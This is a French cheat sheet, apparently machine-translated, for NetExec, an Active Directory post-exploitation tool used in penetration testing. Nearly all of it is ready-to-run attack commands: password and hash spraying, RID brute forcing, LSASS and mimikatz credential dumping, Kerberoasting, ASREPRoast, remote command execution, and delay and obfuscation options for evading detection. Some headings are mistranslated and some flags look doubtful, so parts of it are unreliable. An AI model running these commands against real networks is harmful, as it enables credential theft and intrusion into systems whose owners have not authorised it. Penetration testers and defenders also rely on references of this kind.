Aller au contenu

Exec net

Copier toutes les commandes Générer PDF

NetExec (anciennement CrackMapExec) est un outil post-exploitation qui permet d'automatiser l'évaluation de la sécurité des grands réseaux Active Directory grâce à l'abus de protocole réseau et aux attaques de justificatifs.

Installation et configuration

Command Description
pip3 install netexec Install NetExec via pip
pipx install netexec Install with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.git Clone from GitHub
cd NetExec && pip3 install . Install from source
netexec --version Check installed version
netexec --help Display help information

Utilisation de base

Command Description
netexec smb 192.168.1.0/24 Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p password Authenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhash Authenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p '' Anonymous authentication
netexec smb targets.txt -u username -p password Use target file

Appui au protocole

Protocole SMB

Command Description
netexec smb 192.168.1.100 Basic SMB enumeration
netexec smb 192.168.1.100 --shares Enumerate shares
netexec smb 192.168.1.100 --users Enumerate users
netexec smb 192.168.1.100 --groups Enumerate groups
netexec smb 192.168.1.100 --local-groups Enumerate local groups
netexec smb 192.168.1.100 --sessions Enumerate sessions
netexec smb 192.168.1.100 --disks Enumerate disks

Protocole WinRM

Command Description
netexec winrm 192.168.1.100 -u username -p password WinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami" Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 Execute PowerShell script

Protocole LDAP

Command Description
netexec ldap 192.168.1.100 -u username -p password LDAP authentication
netexec ldap 192.168.1.100 -u username -p password --users Enumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groups Enumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computers Enumerate computers

Protocole MSSQL

Command Description
netexec mssql 192.168.1.100 -u username -p password MSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-auth Local authentication

Protocole SSH

Command Description
netexec ssh 192.168.1.100 -u username -p password SSH authentication
netexec ssh 192.168.1.100 -u username -k id_rsa SSH key authentication
netexec ssh 192.168.1.100 -u username -p password -x "id" Execute command

Méthodes d'authentification

Authentification du mot de passe

Command Description
netexec smb 192.168.1.100 -u username -p password Single credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txt Credential lists
netexec smb 192.168.1.100 -u username -p passwords.txt Password spraying
netexec smb 192.168.1.100 -u users.txt -p password User enumeration

Authentification en Hash

Command Description
netexec smb 192.168.1.100 -u username -H ntlmhash NTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash LM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txt Hash lists

Authentification Kerberos

Command Description
netexec smb 192.168.1.100 -u username -p password -k Kerberos authentication
netexec smb 192.168.1.100 -u username --use-kcache Use Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberos Force Kerberos

Énumération

Énumération des parts

Command Description
netexec smb 192.168.1.100 --shares List shares
netexec smb 192.168.1.100 --shares -u username -p password Authenticated share listing
netexec smb 192.168.1.100 --spider SHARE Spider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" Search for files

Énumération des utilisateurs

Command Description
netexec smb 192.168.1.100 --users Enumerate users
netexec smb 192.168.1.100 --rid-brute RID bruteforce
netexec smb 192.168.1.100 --users --rid-brute 1000-2000 RID range

Énumération des groupes

Command Description
netexec smb 192.168.1.100 --groups Enumerate groups
netexec smb 192.168.1.100 --local-groups Local groups
netexec smb 192.168.1.100 --groups "Domain Admins" Specific group

Énumération par ordinateur

Command Description
netexec ldap 192.168.1.100 --computers Enumerate computers
netexec smb 192.168.1.100 --computers SMB computer enumeration

Exécution des commandes

Exécution de la commande SMB

Command Description
netexec smb 192.168.1.100 -u username -p password -x "whoami" Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1 Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec Use WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec Use SMB execution

Exécution de la commande WinRM

Command Description
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 Execute script

Modules

Modules intégrés

Command Description
netexec smb 192.168.1.100 -M spider_plus Enhanced spidering
netexec smb 192.168.1.100 -M enum_avproducts Enumerate AV products
netexec smb 192.168.1.100 -M gpp_password Group Policy Preferences
netexec smb 192.168.1.100 -M lsassy LSASS dumping
netexec smb 192.168.1.100 -M mimikatz Mimikatz execution

Options du module

Command Description
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false Module options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true Bloodhound output

Opérations de bases de données

Command Description
netexec smb 192.168.1.100 --users --export users.csv Export to CSV
netexec db Database management
netexec db --workspace default Set workspace
netexec db --clear-database Clear database

Caractéristiques avancées

Stuffing à titre d'élément constitutif

Command Description
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success Continue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 Fail limit

Politique sur le mot de passe

Command Description
netexec smb 192.168.1.100 --pass-pol Get password policy
netexec ldap 192.168.1.100 --pass-pol LDAP password policy

Intégration de Bloodhound

Command Description
netexec ldap 192.168.1.100 -u username -p password --bloodhound Collect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All All collections

ATREPRoast

Command Description
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt ASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt Authenticated ASREPRoast

Kerberoasting

Command Description
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt Kerberoasting attack

Production et exploitation

Command Description
netexec smb 192.168.1.100 --verbose Verbose output
netexec smb 192.168.1.100 --debug Debug output
netexec smb 192.168.1.100 -o output.txt Save output to file
netexec smb 192.168.1.100 --log logs/ Log directory

Configuration

Fichier de configuration (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Options propres à chaque protocole

Command Description
netexec smb 192.168.1.100 --port 445 Custom port
netexec smb 192.168.1.100 --timeout 5 Connection timeout
netexec smb 192.168.1.100 --threads 100 Thread count

Techniques d'évacuation

Command Description
netexec smb 192.168.1.100 --jitter 1-5 Random delay
netexec smb 192.168.1.100 --delay 2 Fixed delay
netexec smb 192.168.1.100 --obfs Obfuscation

Scénarios d'attaque communs

Énumération des domaines

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
```_

### Attaques crédibles
```bash
# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
```_

### Après exploitation
```bash
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Intégration avec d'autres outils

Intégration de l'empacket

Command Description
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec Use Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec Use Impacket SMB

Migration de Crackmapexec

Command Description
netexec --convert-cme-db Convert CME database
alias cme='netexec' Create alias for compatibility

Dépannage

Command Description
netexec --help General help
netexec smb --help Protocol-specific help
netexec -v Version information
netexec --debug smb 192.168.1.100 Debug mode

Meilleures pratiques

  • Utiliser l'authentification avant le dénombrement si possible
  • Mettre en place des délais appropriés pour éviter la détection
  • Utiliser des espaces de travail pour organiser différents engagements
  • Résultats des exportations pour analyse plus approfondie
  • Combiner avec d'autres outils pour une évaluation complète
  • Surveiller les réactions défensives
  • Utiliser le nombre de fils approprié pour éviter les cibles écrasantes
  • Mettre en place un système d'enregistrement approprié pour la documentation
  • Valider les références avant les attaques à grande échelle
  • Utiliser des techniques d'obfuscation si nécessaire

Considérations en matière de sécurité

  • Utilisation uniquement sur les réseaux autorisés
  • Mettre en place des contrôles d'accès appropriés
  • Moniteur de détection par des outils de sécurité
  • Utiliser les principes de moindre privilège
  • Documenter toutes les activités de conformité
  • Coordonner avec l'équipe bleue le cas échéant
  • Mettre en œuvre des procédures de nettoyage appropriées
  • Stocker les identifiants en toute sécurité
  • Utiliser la communication cryptée si possible
  • Mises à jour régulières pour maintenir l'efficacité